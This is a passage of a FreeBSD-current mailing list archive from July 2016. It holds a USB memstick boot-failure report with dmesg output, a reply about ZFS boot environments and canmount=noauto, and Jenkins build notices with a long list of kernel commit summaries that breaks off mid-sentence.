none3@pci0:0:22:0: class=3D0x078000 card=3D0x07061028 chip=3D0xa13a808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H CSME HECI' > class =3D simple comms > ahci0@pci0:0:23:0: class=3D0x010601 card=3D0x07061028 chip=3D0xa103808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H SATA Controller [AHCI mode]' > class =3D mass storage > subclass =3D SATA > pcib3@pci0:0:28:0: class=3D0x060400 card=3D0x07061028 chip=3D0xa110808= 6 = > rev=3D0xf1 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H PCI Express Root Port' > class =3D bridge > subclass =3D PCI-PCI > pcib4@pci0:0:28:4: class=3D0x060400 card=3D0x07061028 chip=3D0xa114808= 6 = > rev=3D0xf1 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H PCI Express Root Port' > class =3D bridge > subclass =3D PCI-PCI > pcib5@pci0:0:28:5: class=3D0x060400 card=3D0x07061028 chip=3D0xa115808= 6 = > rev=3D0xf1 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H PCI Express Root Port' > class =3D bridge > subclass =3D PCI-PCI > pcib6@pci0:0:28:6: class=3D0x060400 card=3D0x07061028 chip=3D0xa116808= 6 = > rev=3D0xf1 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H PCI Express Root Port' > class =3D bridge > subclass =3D PCI-PCI > isab0@pci0:0:31:0: class=3D0x060100 card=3D0x07061028 chip=3D0xa14e808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H LPC Controller' > class =3D bridge > subclass =3D PCI-ISA > none4@pci0:0:31:2: class=3D0x058000 card=3D0x07061028 chip=3D0xa121808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H PMC' > class =3D memory > hdac0@pci0:0:31:3: class=3D0x040300 card=3D0x07061028 chip=3D0xa170808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H HD Audio' > class =3D multimedia > subclass =3D HDA > none5@pci0:0:31:4: class=3D0x0c0500 card=3D0x07061028 chip=3D0xa123808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H SMBus' > class =3D serial bus > subclass =3D SMBus > vgapci0@pci0:2:0:0: class=3D0x030200 card=3D0x07061028 chip=3D0x139b10= de = > rev=3D0xa2 hdr=3D0x00 > vendor =3D 'NVIDIA Corporation' > device =3D 'GM107M [GeForce GTX 960M]' > class =3D display > subclass =3D 3D > re0@pci0:4:0:0: class=3D0x020000 card=3D0x07061028 chip=3D0x816810ec r= ev=3D0x10 = > hdr=3D0x00 > vendor =3D 'Realtek Semiconductor Co., Ltd.' > device =3D 'RTL8111/8168/8411 PCI Express Gigabit Ethernet = > Controller' > class =3D network > subclass =3D ethernet > iwm0@pci0:5:0:0: class=3D0x028000 card=3D0xc0708086 chip=3D0x08b18086 = rev=3D0x6b = > hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Wireless 7260' > class =3D network > none6@pci0:6:0:0: class=3D0xff0000 card=3D0x522a10ec chip=3D0x522a10ec= = > rev=3D0x01 hdr=3D0x00 > vendor =3D 'Realtek Semiconductor Co., Ltd.' > device =3D 'RTS522A PCI Express Card Reader' > > > What other info do we need? > > > > Path: /usr/src > Working Copy Root Path: /usr/src > URL: https://svn.freebsd.org/base/head > Relative URL: ^/head > Repository Root: https://svn.freebsd.org/base > Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f > Revision: 303419 > Node Kind: directory > Schedule: normal > Last Changed Author: bdrewery > Last Changed Rev: 303419 > Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) > > > FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 = = > 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 = = > 1200001 1200001 From owner-freebsd-current@freebsd.org Thu Jul 28 09:24:25 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 4DEBBBA70A0 for ; Thu, 28 Jul 2016 09:24:25 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: from mail-vk0-x230.google.com (mail-vk0-x230.google.com [IPv6:2607:f8b0:400c:c05::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id ED2E21C86; Thu, 28 Jul 2016 09:24:24 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: by mail-vk0-x230.google.com with SMTP id n129so27754938vke.3; Thu, 28 Jul 2016 02:24:24 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:references:in-reply-to:from:date:message-id:subject:to; bh=F4FqgxM44IJPWi1xK6lqmjauxn8Kg+D43r7RQTQiVbU=; b=fgHK4T7fH1VrB7QcWPvnpL4G+oqUo31iqFlxVGbODDCo79j+meV6ak1xj5t4BDPCRB 6wUzjZtCsNFBbbqfjOIKFi/R37K59IvJRXV5zakHxiRxjBQsVAZhT4Hb1Yurn3evZwY/ vlm/SwLGL9K0KrUesqZguRsdQLXyUfcn8ytPLtZQNMClXQeYmG+Sdjkxi2tRUCLGIzPY dJrIbedvnwmr+KCZOnLL15i4BpDRs2SiudPJAjcCpIC6lYgIgzbZbpkaHVOE2S8N4GKF A5xAFHsTdDkPNN/njpxc7IHXXnY5SrgMRVdn/R6pZFRjkgiGJp3V6kwkfaoyKkZLVYou jOWg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to; bh=F4FqgxM44IJPWi1xK6lqmjauxn8Kg+D43r7RQTQiVbU=; b=WKT7MhOD0HUcdFl3iwiu6p5cqazDpRx8JMAK6+qqrqRPaezN2X4ld5682Jyi1Jnd2L mzY8NFfTSd6os88d3WvK+7FxAZddUa5YoOdRt+pcGWDxUfBC+npjVJ4BQtUou7gYj9da svmSX2b9KKnaXaTbeqZFN1dElBFM1eiHIDAfmavx3P5qnj8KPBEOJNUsr5PqWO4rHruj hgmuG3RgNIRUWqEPQyOhcOwnSL+J+sRfr1yIbAL4cdWIP5qm3bQFHCf1/GqGcqjmXmGn jae22L3WImVehct0tPqFNW8EVrGhzdf9LUY4/UDMZz+HBgC2W6ijjZO6jq0sieN2YihT hkzg== X-Gm-Message-State: AEkoousYah+UlggDuxn88liIffeb4GH02NaQoPk0IYpiXzZZlXzsztFmJ6nOkoFkjn9+D7xpLESWDvT4wFLrbA== X-Received: by 10.31.115.140 with SMTP id o134mr15444006vkc.0.1469697863820; Thu, 28 Jul 2016 02:24:23 -0700 (PDT) MIME-Version: 1.0 References: In-Reply-To: From: Howard Su Date: Thu, 28 Jul 2016 09:24:14 +0000 Message-ID: Subject: Re: Fwd: Failed to boot -Current snapshot memstick img with EFI To: Allan Jude , freebsd-current@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 09:24:25 -0000 It turns out a USB driver problem. the usb disk size is not correctly detected. But the disk works fine in BIOS. Here is dmesg information: ugen7.2: at usbus7 umass0: on usbus7 umass0: SCSI over Bulk-Only; quirks =3D 0x8100 umass0:6:0: Attached to scbus6 da0 at umass-sim0 bus 0 scbus6 target 0 lun 0 da0: Removable Direct Access SPC-4 SCSI device da0: Serial Number 137161312223005B da0: 40.000MB/s transfers da0: 0MB (1 512 byte sectors) <---------------- da0: quirks=3D0x2 GEOM_PART: integrity check failed (da0, MBR) GEOM_PART: integrity check failed (diskid/DISK-137161312223005B, MBR) Anyone has idea how this happen? -Howard On Wed, Jul 27, 2016 at 12:21 PM Howard Su wrote: > 8GB > > Allan Jude =E4=BA=8E2016=E5=B9=B47=E6=9C=8827=E6= =97=A5=E5=91=A8=E4=B8=89 =E4=B8=8A=E5=8D=8811:35=E5=86=99=E9=81=93=EF=BC=9A > >> On 2016-07-26 23:33, Howard Su wrote: >> > The same issue is still there in 11-BETA2. I tried the memstick image >> for >> > amd64. I got the exact same error (with boot -v). >> > =E2=80=8BGEOM_PART: last LBA is below first LBA: 0 < 32 >> > GEOM_PART: integrity check failed (da0, MBR) >> > >> > This make mem stick image totally useless. Anyone take a look? I am >> happy >> > to provide more information. >> > >> > Thanks, >> > >> > Howard >> > >> > ---------- Forwarded message ---------- >> > From: Howard Su >> > Date: Sat, Apr 23, 2016 at 10:40 PM >> > Subject: Failed to boot -Current snapshot memstick img with EFI >> > To: "freebsd-current@freebsd.org" >> > >> > >> > The issue is partition table in img is wrong so that GEOM cannot >> discover >> > the partitions. >> > >> > Detailed error: >> > =E2=80=8B=E2=80=8B >> > GEOM_PART: last LBA is below first LBA: 0 < 32 >> > GEOM_PART: integrity check failed (da0, MBR) >> > >> > I tried this month and last month memstick img. both has same problem. >> Any >> > idea on the issue? >> > >> > -Howard >> > >> >> The last LBA is being reported as 0, which is obviously bogus. >> >> How big is the USB device you have written the memstick to? >> >> -- >> Allan Jude >> >> -- > -Howard > --=20 -Howard From owner-freebsd-current@freebsd.org Thu Jul 28 10:11:00 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 2D51BBA700F for ; Thu, 28 Jul 2016 10:11:00 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 1BB061A39; Thu, 28 Jul 2016 10:11:00 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 22BD014A; Thu, 28 Jul 2016 10:10:50 +0000 (UTC) Date: Thu, 28 Jul 2016 10:10:45 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <775180052.32.1469700645055.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <413741174.0.1469201628725.JavaMail.jenkins@jenkins-9.freebsd.org> References: <413741174.0.1469201628725.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is unstable: FreeBSD_HEAD #488 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 10:11:00 -0000 See From owner-freebsd-current@freebsd.org Thu Jul 28 10:34:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id A5214BA769D for ; Thu, 28 Jul 2016 10:34:50 +0000 (UTC) (envelope-from avg@FreeBSD.org) Received: from citapm.icyb.net.ua (citapm.icyb.net.ua [212.40.38.140]) by mx1.freebsd.org (Postfix) with ESMTP id BEA5E1A5B; Thu, 28 Jul 2016 10:34:49 +0000 (UTC) (envelope-from avg@FreeBSD.org) Received: from porto.starpoint.kiev.ua (porto-e.starpoint.kiev.ua [212.40.38.100]) by citapm.icyb.net.ua (8.8.8p3/ICyb-2.3exp) with ESMTP id NAA22994; Thu, 28 Jul 2016 13:34:41 +0300 (EEST) (envelope-from avg@FreeBSD.org) Received: from localhost ([127.0.0.1]) by porto.starpoint.kiev.ua with esmtp (Exim 4.34 (FreeBSD)) id 1bSieH-000EZz-2H; Thu, 28 Jul 2016 13:34:41 +0300 Subject: Re: Boot environments and zfs canmount=noauto To: Allan Jude , freebsd-current@FreeBSD.org, rwestlun@gmail.com References: <20160728020548.GD26793@gmail.com> From: Andriy Gapon Message-ID: <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> Date: Thu, 28 Jul 2016 13:34:03 +0300 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 10:34:50 -0000 On 28/07/2016 05:18, Allan Jude wrote: > On 2016-07-27 22:05, Randy Westlund wrote: >> I'm trying to follow Michael Dexter's post about using bhyve with boot >> environments. It involves moving all child datasets under >> zroot/ROOT/default, so that you can have entirely independent systems. >> >> http://callfortesting.org/bhyve-boot-environments/ >> >>> Let's change the datasets with "canmount on" to "canmount noauto": >>> [snip] >>> Considering that this setting is harmless to a system with a single >>> boot environment, I would not object to it being the default. Hint >>> hint. >> >> When I set all the datasets with canmount=on to canmount=noauto, only >> zroot/ROOT/default gets mounted on next boot. It's my understanding >> that 'zfs mount -a' doesn't mount datasets with canmount=noauto, but if >> I leave them with canmount=on, they will try to mount regardless of >> which BE is active. >> >> I'm trying this with 11.0-BETA2. Can sometime tell me what I'm missing? >> > > You are not missing anything. This is why the default is to have all > files that are specific to a BE be in the root dataset, and only files > that are global (like home directory, etc) be outside of the BE. Locally I have the following rc script to handle subordinate datasets of a boot environment: http://dpaste.com/0Q0JPGN.txt It is designed for exactly the scenario described above. The script is automatically enabled when zfs_enable is enabled. It would probably make sense to include the script into the OS after some testing and a review. -- Andriy Gapon From owner-freebsd-current@freebsd.org Thu Jul 28 12:11:23 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 4BD75BA7F51 for ; Thu, 28 Jul 2016 12:11:23 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 3D85F1E07; Thu, 28 Jul 2016 12:11:23 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 499EE14F; Thu, 28 Jul 2016 12:11:13 +0000 (UTC) Date: Thu, 28 Jul 2016 12:10:49 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: markj@FreeBSD.org, rrs@FreeBSD.org, sephe@FreeBSD.org, ivadasz@FreeBSD.org, ed@FreeBSD.org, kib@FreeBSD.org, stevek@FreeBSD.org, loos@FreeBSD.org, bdrewery@FreeBSD.org, jkim@FreeBSD.org, jhb@FreeBSD.org, emaste@FreeBSD.org, mav@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1704639061.37.1469707873317.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_amd64_gcc - Build #1453 - Failure MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_amd64_gcc X-Jenkins-Result: FAILURE Precedence: bulk X-Mailman-Approved-At: Thu, 28 Jul 2016 12:42:50 +0000 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 12:11:23 -0000 FreeBSD_HEAD_amd64_gcc - Build #1453 - Failure: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_amd64_gcc/1= 453/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_amd64_gcc/145= 3/changes Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_amd64_gcc/1453= /console Change summaries: 303429 by mav: Once more refactor KPI between NTB hardware and consumers. New design allows hardware resources to be split between several consumers. For example, one BAR can be dedicated for remote memory access, while other resources can be used for packet transport for virtual Ethernet interface. And even without resource split, this code allows to specify which consumer driver should attach the hardware. >From some points this makes the code even closer to Linux one, even though Linux does not provide the described flexibility. 303428 by ed: Add NI_NUMERICSCOPE. POSIX also declares NI_NUMERICSCOPE, which makes getnameinfo() return a numerical scope identifier. The interesting thing is that support for this is already present in code, but #ifdef disabled. Expose this functionality by placing a definition for it in . While there, remove references to NI_WITHSCOPEID, as that got removed 11 years ago. 303427 by ed: Change type of MB_CUR_MAX and MB_CUR_MAX_L() to size_t. POSIX requires that MB_CUR_MAX expands to an expression of type size_t. It currently expands to an int. As these are already macros, don't change the underlying type of these functions. There is no ned to touch those. Differential Revision:=09https://reviews.freebsd.org/D6645 303426 by kib: Rewrite subr_sleepqueue.c use of callouts to not depend on the specifics of callout KPI. Esp., do not depend on the exact interface of callout_stop(9) return values. The main change is that instead of requiring precise callouts, code maintains absolute time to wake up. Callouts now should ensure that a wake occurs at the requested moment, but we can tolerate both run-away callout, and callout_stop(9) lying about running callout either way. As consequence, it removes the constant source of the bugs where sleepq_check_timeout() causes uninterruptible thread state where the thread is detached from CPU, see e.g. r234952 and r296320. Patch also removes dual meaning of the TDF_TIMEOUT flag, making code (IMO much) simpler to reason about. Tested by:=09pho Reviewed by:=09jhb Sponsored by:=09The FreeBSD Foundation MFC after:=091 month Differential revision:=09https://reviews.freebsd.org/D7137 303425 by kib: Extract the calculation of the callout fire time into the new function callout_when(9). See the man page update for the description of the intended use. Tested by:=09pho Reviewed by:=09jhb, bjk (man page updates) Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7137 303424 by kib: Fix typo in comment. MFC after: 3 days 303423 by kib: When a debugger attaches to the process, SIGSTOP is sent to the target. Due to a way issignal() selects the next signal to deliver and report, if the simultaneous or already pending another signal exists, that signal might be reported by the next waitpid(2) call. This causes minor annoyance for debuggers, which must be prepared to take any signal as the first event, then filter SIGSTOP later. More importantly, for tools like gcore(1), which attach and then detach without processing events, SIGSTOP might leak to be delivered after PT_DETACH. This results in the process being unintentionally stopped after detach, which is fatal for automatic tools. The solution is to force SIGSTOP to be the first signal reported after the attach. Attach code is modified to set P2_PTRACE_FSTP to indicate that the attaching ritual was not yet finished, and issignal() prefers SIGSTOP in that condition. Also, the thread which handles P2_PTRACE_FSTP is made to guarantee to own p_xthread during the first waitpid(2). All that ensures that SIGSTOP is consumed first. Additionally, if P2_PTRACE_FSTP is still set on detach, which means that waitpid(2) was not called at all, SIGSTOP is removed from the queue, ensuring that the process is resumed on detach. In issignal(), when acting on STOPing signals, remove the signal from queue before suspending. Otherwise parallel attach could result in ptracestop() acting on that STOP as if it was the STOP signal from the attach. Then SIGSTOP from attach leaks again. As a minor refactoring, some bits of the common attach code is moved to new helper proc_set_traced(). Reported by:=09markj Reviewed by:=09jhb, markj Tested by:=09pho Sponsored by:=09The FreeBSD Foundation MFC after:=092 weeks Differential revision:=09https://reviews.freebsd.org/D7256 303422 by sephe: hyperv/vmbus: Inclusion cleanup MFC after:=091 week Sponsored by:=09Microsoft Differential Revision:=09https://reviews.freebsd.org/D7334 303421 by sephe: hyperv/vmbus: Avoid unnecessary mb() MFC after:=091 week Sponsored by:=09Microsoft Differential Revision:=09https://reviews.freebsd.org/D7333 303420 by loos: Enable the build of micphy as part of generic miibus build, but only for FDT enabled systems. Sponsored by:=09Rubicon Communications (Netgate) 303419 by bdrewery: Fix non-amd64 build from r292043 after reconnecting in r303410. MFC after:=093 days X-MFC-With:=09r303410 Sponsored by:=09EMC / Isilon Storage Division 303418 by ivadasz: [iwm] When stopping TX DMA, wait for all channels at once. * Makes the TX DMA stopping more similar to Linux code, and potentially a bit faster. Also, output an error message when TX DMA idling fails. Taken-From: Linux iwlwifi Tested: * AC3165, STA mode Approved by:=09adrian (mentor) Obtained from:=09DragonFlyBSD git 2ee486ddff973ac552ff787c17e8d83e8ae0f24c Differential Revision:=09https://reviews.freebsd.org/D7325 303417 by bdrewery: opt_bdg.h was removed in r150636. MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303416 by ivadasz: [iwm] Set different pm_timeout for action frames. When building a Tx Command for management frames, we are lacking a check for action frames, for which we should set a different pm_timeout. This cause the fw to stay awake for 100TU after each such frame is transmitted, resulting an excessive power consumption. Taken-From: Linux iwlwifi (git b084a35663c3f1f7) Approved by:=09adrian (mentor) Obtained from:=09Linux git b084a35663c3f1f7de1c45c4ae3006864c940fe7 Obtained from:=09DragonFlyBSD git ba00f0e3ae873d6f0d5743e22c3ebc49c44dfdac Differential Revision:=09https://reviews.freebsd.org/D7324 303415 by bdrewery: opt_apic.h is only used on i386. MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303414 by bdrewery: opt_random.h was removed in r287558 for opt_global.h MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303413 by ivadasz: [iwm] Fix inverted logic in iwm_tx(). The PROT_REQUIRE flag in should be set for data frames above a certain length, but we were setting it for !data frames above a certain length, which makes no sense at all. Taken-From: OpenBSD, Linux iwlwifi Approved by:=09adrian (mentor) Obtained from:=09DragonFlyBSD git 8cc03924a36c572c2908e659e624f44636dc2b33 Differential Revision:=09https://reviews.freebsd.org/D7323 303412 by rrs: Remove myself from kern_timeout.c yeah! 303411 by stevek: Prepare for network stack as a module - Move cr_canseeinpcb to sys/netinet/in_prot.c in order to separate the INET and INET6-specific code from the rest of the prot code (It is only used by the network stack, so it makes sense for it to live with the other network stack code.) - Move cr_canseeinpcb prototype from sys/systm.h to netinet/in_systm.h - Rename cr_seeotheruids to cr_canseeotheruids and cr_seeothergids to cr_canseeothergids, make them non-static, and add prototypes (so they can be seen/called by in_prot.c functions.) - Remove sw_csum variable from ip6_forward in ip6_forward.c, as it is an unused variable. Reviewed by:=09gnn, jtl Approved by:=09sjg (mentor) Sponsored by:=09Juniper Networks, Inc. Differential Revision:=09https://reviews.freebsd.org/D2901 303410 by bdrewery: Reconnect pmcstudy, lost in r291021 Reported by:=09pluknet MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303406 by jhb: Adjust tests in fsync job scheduling loop to reduce indentation. 303405 by jhb: Add support for zero-copy aio_write() on TOE sockets. AIO write requests for a TOE socket on a Chelsio T4+ adapter can now DMA directly from the user-supplied buffer. This is implemented by wiring the pages backing the user-supplied buffer and queueing special mbufs backed by raw VM pages to the socket buffer. The TOE code recognizes these special mbufs and builds a sglist from the VM page array associated with the mbuf when queueing a work request to the TOE. Because these mbufs do not have an associated virtual address, m_data is not valid. Thus, the AIO handler does not invoke sosend() directly for these mbufs but instead inlines portions of sosend_generic() and tcp_usr_send(). An aiotx_buffer structure is used to describe the user buffer (e.g. it holds the array of VM pages and a reference to the AIO job). The special mbufs reference this structure via m_ext. Note that a single job might be split across multiple mbufs (e.g. if it is larger than the socket buffer size). The 'ext_arg2' member of each mbuf gives an offset relative to the backing aiotx_buffer. The AIO job associated with an aiotx_buffer structure is completed when the last reference to the structure is released. Zero-copy aio_write()'s for connections associated with a given adapter can be enabled/disabled at runtime via the 'dev.t[45]nex.N.toe.tx_zcopy' sysctl. MFC after:=091 month Relnotes:=09yes Sponsored by:=09Chelsio Communications 303404 by jkim: Add a hack to add weekday to date format for ko_KR locale. 303400 by emaste: libcxxrt: fix demangling of wchar_t 'wchar_t' is 7 characters long, not 6. r303297 fixed this in libelftc, but not the second copy of this file that we have in libcxxrt. PR:=09=09208661 Submitted by:=09Daniel McRobb Obtained from:=09ELF Tool Chain r3480 MFC after:=093 days 303399 by markj: De-pluralize "queues" where appropriate in the pagedaemon code. MFC after:=091 week 303396 by emaste: rename ARM's libunwind.S to to avoid conflict with llvm libunwind llvm libunwind includes a libunwind.cpp, but on ARM libunwind.S is found first in .PATH. Rename the latter one, since it is not going to be updated again. Reviewed by:=09andrew MFC after:=093 days Sponsored by:=09The FreeBSD Foundation Differential Revision:=09https://reviews.freebsd.org/D7162 303394 by emaste: Enable LLVM libunwind by default on amd64 and i386 It is a maintained and updated runtime exception stack unwinder that should be a drop-in replacement. It can be disabled by setting WITHOUT_LLVM_LIBUNWIND in src.conf. PR:=09=09206039 [exp-run] Sponsored by:=09The FreeBSD Foundation 303393 by kib: Remove empty initializer for the once facility. It was not needed since r179417. Sponsored by:=09The FreeBSD Foundation MFC after:=091 week 303392 by emaste: Remove ${OBJDUMP} as it is not used by the base system It was added to sys.mk relatively recently (r274503) for EFI builds but is no longer used by the base system. The in-tree binutils are outdated, will not be updated, and will be removed in the future. Remove it from the toolchain build now to slightly simplify the build and make sure we don't grow an accidental dependency. Note that this affects only the toolchain build, and does not affect /usr/bin/objdump in the built world. Reviewed by:=09bdrewery Sponsored by:=09The FreeBSD Foundation Differential Revision:=09https://reviews.freebsd.org/D6460 303391 by emaste: ANSIfy kern_proc.c and delete register keyword Reviewed by:=09kib Sponsored by:=09The FreeBSD Foundation Differential Revision:=09https://reviews.freebsd.org/D6478 303390 by emaste: syscons,vt: improve phrasing in kern.vty man page description Submitted by:=09wblock 303388 by kib: Remove Giant from settime(), tc_setclock_mtx guards tc_windup() calls, and there is no other issues with parallel settime(). Remove spl() vestiges there as well. Tested by:=09pho (as part of the whole patch) Reviewed by:=09jhb (same) Discussed wit:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month Differential revision:=09https://reviews.freebsd.org/D7302 303387 by kib: Prevent parallel tc_windup() calls, both parallel top-level calls from setclock() and from simultaneous top-level and interrupt. For this, tc_windup() is protected with a tc_setclock_mtx spinlock, in the try mode when called from hardclock interrupt. If spinlock cannot be obtained without spinning from the interrupt context, this means that top-level executes tc_windup() on other core and our try may be avoided. The boottimebin and boottime variables should be adjusted from tc_windup(). To be correct, they must be part of the timehands and read using lockless protocol. Remove the globals and reimplement the getboottime(9)/getboottimebin(9) KPI using the timehands read protocol. Tested by:=09pho (as part of the whole patch) Reviewed by:=09jhb (same) Discussed wit:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 303386 by kib: Fix a bug in r302252. Change ntpadj_lock to spinlock always, and rename stuff removing ADJ/adj from the names. ntp_update_second() requires ntp_lock and is called from the tc_windup(), so ntp_lock must be a spinlock. Add missed lock to ntp_update_second(). Tested by:=09pho (as part of the whole patch) Reviewed by:=09jhb (same) Noted by:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 303385 by kib: Reduce the resettodr_lock scope to only CLOCK_SETTIME() call. Tested by:=09pho (as part of the whole patch) Reviewed by:=09jhb (same) Discussed with:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 303384 by kib: Style. Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 303383 by kib: Reduce number of timehands to just two. This is useful because consumers can now be only one tc_windup() call late. Use C99 initialization. Tested by:=09pho (as part of the whole patch) Reviewed by:=09jhb (same) Discussed with:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 303382 by kib: Hide the boottime and bootimebin globals, provide the getboottime(9) and getboottimebin(9) KPI. Change consumers of boottime to use the KPI. The variables were renamed to avoid shadowing issues with local variables of the same name. Issue is that boottime* should be adjusted from tc_windup(), which requires them to be members of the timehands structure. As a preparation, this commit only introduces the interface. Some uses of boottime were found doubtful, e.g. NLM uses boottime to identify the system boot instance. Arguably the identity should not change on the leap second 